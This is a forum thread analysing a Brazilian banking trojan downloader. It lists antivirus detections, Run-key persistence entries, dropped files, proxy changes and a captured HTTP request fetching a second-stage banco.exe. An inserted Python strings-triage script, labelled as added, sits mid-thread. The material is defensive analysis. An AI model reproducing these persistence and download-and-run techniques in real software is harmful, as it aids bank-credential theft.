
CartaoMagico Analysis



found at:
appears to be packed with PECompact2
has a Microsoft Word icon

Engine Version Date Result
AntiVir 12.27.2006 TR/Delphi.Downloader.Gen
Authentium 4.93.8 12.22.2006 no virus found
Avast 4.7.892.0 12.21.2006 no virus found
AVG 386 12.27.2006 no virus found
BitDefender 7.2 12.27.2006 Trojan.IM.Flooder.Delf.H
CAT-QuickHeal 8.00 12.27.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 12.27.2006 Trojan.Downloader.Banload-1331
DrWeb 4.33 12.27.2006 DLOADER.Trojan
eSafe 12.26.2006 Suspicious Trojan/Worm
eTrust-InoculateIT 23.73.99 12.27.2006 no virus found
eTrust-Vet 30.3.3283 12.27.2006 no virus found
Ewido 4.0 12.26.2006 Downloader.Banload.atk
Fortinet 12.27.2006 no virus found
F-Prot 3.16f 12.22.2006 no virus found
F-Prot4 12.22.2006 no virus found
Ikarus T3.1.0.27 12.27.2006 Trojan-Spy.Win32.Banker.anv
Kaspersky 12.27.2006 IM-Flooder.Win32.Delf.h
McAfee 4927 12.27.2006 no virus found
Microsoft 1.1904 12.27.2006 no virus found
NOD32v2 1940 12.27.2006 a variant of Win32/TrojanDownloader.Banload.BDJ
Norman 5.80.02 12.27.2006 no virus found
Panda 12.27.2006 Suspicious file
Prevx1 V2 12.27.2006 no virus found
Sophos 4.13.0 12.26.2006 no virus found
Sunbelt 2.2.907.0 12.18.2006 VIPRE.Suspicious
TheHacker 12.27.2006 no virus found
UNA 1.83 12.27.2006 no virus found
VBA32 3.11.1 12.27.2006 IM-Worm.Win32.Delf.c
VirusBuster 4.3.19:9 12.27.2006 no virus found

connects to: and gets /banco.exe
OrgName: Internet Services, Inc.
Address: 1333 North Stemmons Freeway
Address: Suite 110
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US

banco.exe is associated with https//
so maybe a Brazilian bank hijacker.

creates processes

adds files
c:\documents and settings\all users\start menu\programs\startup\exalien.exe
c:\documents and settings\username\local settings\temporary internet files\content.ie5\randomname\banco.exe
C:\Arquivos de programas\ExAlien.exe

adds registry keys
hkey_local_machine\software\microsoft\windows\currentversion\run\ cartomagico
hkey_local_machine\software\microsoft\windows\currentversion\run\ exalien
These are kind of weird:

HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy
HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable
HKCC\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable

opens a browser window and connects to google

connects to and gets /banco.exe

GET /banco.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Length: 1487872
Content-Type: application/octet-stream
Last-Modified: Tue, 26 Dec 2006 22:08:21 GMT
Accept-Ranges: bytes
ETag: "1a2485b3a29c71:85b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 27 Dec 2006 22:56:32 GMT


Then for some reason it connects to the BBC:
GET /rss/newsonline_world_edition/front_page/rss.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
If-Modified-Since: Tue, 10 Jan 2006 06:41:43 GMT
If-None-Match: "40bf-6896d7c0"
Cache-Control: max-age=0

HTTP/1.1 200 OK
Date: Wed, 27 Dec 2006 22:56:47 GMT
Server: Apache
Last-Modified: Wed, 27 Dec 2006 22:41:41 GMT
Etag: "4277-bbff3340"
Accept-Ranges: bytes
Content-Length: 17015
Cache-Control: max-age=60
Expires: Wed, 27 Dec 2006 22:57:47 GMT
Keep-Alive: timeout=10, max=52
Connection: Keep-Alive
Content-Type: application/xml


00000050 00400050 0 This program must be run under Win32
00000220 00400220 0 .rsrc
00000248 00400248 0 .mackt
00001006 00401006 0 Boolean
0000101B 0040101B 0 False
00001042 00401042 0 Integer
00001082 00401082 0 Cardinal
0000109A 0040109A 0 String
000010ED 004010ED 0 TObject
000010FA 004010FA 0 TObject
0000110C 0040110C 0 System
0000111A 0040111A 0 IInterface
0000113A 0040113A 0 System
000011E1 004011E1 0 TInterfacedObject
000011F9 004011F9 0 TDateTime
000031F0 004031F0 0 SOFTWARE\Borland\Delphi\RTL
0000320C 0040320C 0 FPUMaskValue
00005454 00405454 0 kernel32.dll
00005464 00405464 0 GetLongPathNameA
000054FD 004054FD 0 Uh}U@
000056A8 004056A8 0 Software\Borland\Locales
000056C4 004056C4 0 Software\Borland\Delphi\Locales
000057ED 004057ED 0 UhHX@
00005A2B 00405A2B 0 FFF;M
000060DA 004060DA 0 odSelected
000060E5 004060E5 0 odGrayed
000060EE 004060EE 0 odDisabled odChecked odFocused odDefault
00006117 00406117 0 odHotLight
00006122 00406122 0 odInactive odNoAccel
00006137 00406137 0 odNoFocusRect
00006145 00406145 0 odReserved1
00006151 00406151 0 odReserved2

there are a TON of strings so I didn't include them all, but here are some more good ones:


more later,
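The strings listing above is what points at a Delphi binary (Borland RTL registry paths, TObject/TInterfacedObject names) alongside section and import names. As an added example that is not part of the original post, here is a small parser for that "file_offset virtual_address segment string" layout with triage rules (rule names and the sample rows are constructed for this example):

```python
import re
from collections import Counter

# Constructed sample in the same layout as the listing in the post.
SAMPLE_LISTING = """\
00000050 00400050 0 This program must be run under Win32
00000220 00400220 0 .rsrc
00000248 00400248 0 .mackt
000010ED 004010ED 0 TObject
000031F0 004031F0 0 SOFTWARE\\Borland\\Delphi\\RTL
00005454 00405454 0 kernel32.dll
00005464 00405464 0 GetLongPathNameA
000054FD 004054FD 0 Uh}U@
000056C4 004056C4 0 Software\\Borland\\Delphi\\Locales
"""

LINE_RE = re.compile(r"^([0-9A-Fa-f]{8})\s+([0-9A-Fa-f]{8})\s+(\d+)\s+(.*)$")

# Hypothetical rule names; each regex is matched against the string column.
RULES = {
    "delphi_rtl": re.compile(r"Borland\\(Delphi|Locales)|^T[A-Z]\w+$|^IInterface$"),
    "section_name": re.compile(r"^\.[a-z0-9]{1,7}$"),
    "win32_import": re.compile(r"^[A-Z][A-Za-z0-9]+[AW]$|\.dll$"),
}

def parse_listing(text):
    """Return (file_offset, virtual_address, segment, string) tuples."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.rstrip())
        if m:
            rows.append((int(m.group(1), 16), int(m.group(2), 16),
                         int(m.group(3)), m.group(4)))
    return rows

def image_base(rows):
    """Most common VA-minus-offset delta; a constant delta means the
    listing maps offsets straight onto RVAs (typical of a dumped image)."""
    deltas = Counter(va - off for off, va, _, _ in rows)
    return deltas.most_common(1)[0][0] if deltas else None

def triage(text):
    rows = parse_listing(text)
    hits = {name: [s for _, _, _, s in rows if rx.search(s)]
            for name, rx in RULES.items()}
    return {
        "rows": len(rows),
        "image_base": image_base(rows),
        "sections": hits["section_name"],
        "imports": hits["win32_import"],
        "likely_delphi": len(hits["delphi_rtl"]) >= 2,
    }
```

Run `triage(open("strings.txt").read())` on a full listing; the `.mackt` section name is the one ImportREC writes when it rebuilds an import table, so its presence says the strings came from an already-dumped image rather than the packed file.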



It looks like it's actually packed with PECompact2. That being the case, UnPECompact won't work against it. I know there are supposed to be some OllyDbg scripts out there that will unpack it, but I don't know the URL. Anyone got a link to it/them?


I didn't have much trouble

I didn't have much trouble dynamically unpacking it; however, a first stop site for RE tools, scripts, and information is Pedram's OpenRCE. I highly recommend it, Pedram really knows what he's doing. I also recommend his and Ero's RE malware class at Black Hat if you can afford it.

Here is a link to the ollyscripts.



A typical Brazilian

A typical Brazilian banker.
We develop a tool to remove this kind of malware, very common in Brazil, see:

Fabio Assolini
Security Coordinator


Thanks a lot for the response. That's very useful information.

Please feel free to contribute any time.